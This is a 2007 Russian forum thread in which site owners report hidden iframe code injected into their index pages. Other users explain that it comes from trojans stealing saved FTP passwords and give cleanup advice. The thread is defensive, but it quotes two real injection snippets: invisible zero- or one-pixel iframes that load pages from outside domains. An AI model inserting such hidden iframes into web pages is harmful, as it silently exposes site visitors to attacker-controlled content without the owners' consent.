Форум SAPE.RU

Форум SAPE.RU (http://forum.sape.ru/index.php)
-   Вопросы по работе системы (http://forum.sape.ru/forumdisplay.php?f=13)
-   -   Справка по антивирусному обеспечению (http://forum.sape.ru/showthread.php?t=2958)

mysql 07.07.2007 13:07

Справка по антивирусному обеспечению
 
Доброго времени!

Имею ряд сайтов, подключенных к всеми уважаемой системе SAPE.
Но 2 дня назад обнаружил интересную вещь: почти на всех этих сайтах в конец файлов index.html, index.htm, index.php (где что есть) кем-то был добавлен следующий код после тэга </HTML>:
Код:

<iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe><iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe>
Соответственно, при заходе на страницы сайтов это код прокачивает партнерки гугла, бегуна и т.п...
Есть серьезное подозрение, что в скрипте sape.php есть уязвимость, позволяющая модифицировать файлы на сайтах, где он расположен.
Ни у кого больше нет таких проблем?

Wink 07.07.2007 13:18

Вы подцепили трояна, который увел ваши пароли FTP. Сейчас такое часто бывает. Меняйте пароли, проверяйте комп, очищайте код сайта.
Sape здесь непричем

ABSolut 07.07.2007 13:25

+1 Давненько этот троян бродит.

mysql 07.07.2007 13:32

Спасибо за ответы. Никто не подскажет, что это за троян? Хостинг сайтов на линуксе и не совсем понятно как его почистить. И почему тогда взломали только сайты, подключенные к sape, хотя есть и ряд других?

Wink 07.07.2007 13:48

А причем тут хостинг сайтов? Вы сами то под линуксом сидите или как? А в Total Commander или каком другом менеджере пароли к некоторым сайтам не забиты были? :) Разновидностей такого трояна много, все по разному себя проявляют.

mysql 07.07.2007 13:52

Я сижу под виндой. Есть антивирус, фаервол, проверялка троянов - все со свежими базами и ни одна программа ничего не показывает. Вот поэтому и озадачился. В Total Commander пароли забиты - это факт.

coguar 07.07.2007 14:04

2автор: у меня после </html> стоит только <!-- Use compress gzip -->

:))))
Ищи проблему у себя.

Здравая а может и больная логика подсказывает мне, что если бы было так как сказали ВЫ, то тот кто нашел бы способ изменять файлы через сапу - смог бы найти способ изменить это на ВСЕХ сайтах, а не только у Вас.

ABSolut 07.07.2007 15:03

Цитата:

Сообщение от mysql (Сообщение 24197)
Я сижу под виндой. Есть антивирус, фаервол, проверялка троянов - все со свежими базами и ни одна программа ничего не показывает. Вот поэтому и озадачился. В Total Commander пароли забиты - это факт.

Через ТС и пролезает.
Могу привести цитату с моего хостинга:
Цитата:

Уважаемые клиенты! В связи с активизацией вирусов, похищающих пароли от ftp-аккаунтов, просим вас внимательнее относится к хранению ваших паролей. По возможности, не сохраняйте пароли в ftp-клиентах, вирусы пытаются достать информацию из конфигурации ftp-клиентов. Пользуйтесь антивирусами и firewall'ами.

Так же, старайтесь использовать длиные, "сложные" пароли, состоящие из цифр, строчных и заглавных букв. Хорошая практика - регулярная смена паролей.
Вобщем, меняйте все пароли, перезаливайте index на сайты

V!rus 07.07.2007 16:04

блин, из ТС нада парольки убрать, хотя каспер все время работает.. мало ли что.
ЗЫЖ 2автор, повезло, не так уж и страшно. Троян вообще мог убить все файлы ;)

DeKKO 07.07.2007 17:16

Мне тоже какой-то "доброжелатель" вкатил сегодня
Код HTML:

<iframe src="http://adventureboats.co.nz/skunk/images/index.htm" scrolling="no" frameborder="0" width=0 height=0></iframe>
Смотрите так:
если присадка тупо дописана во все индексы, то меняйте пароль FTP;
если как-то "по-уму" - дыра в движке.

И, я так понял, что такие изделия проиндексируются, как дополнительные внешние сылки.


Часовой пояс GMT +3, время: 18:49.

Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.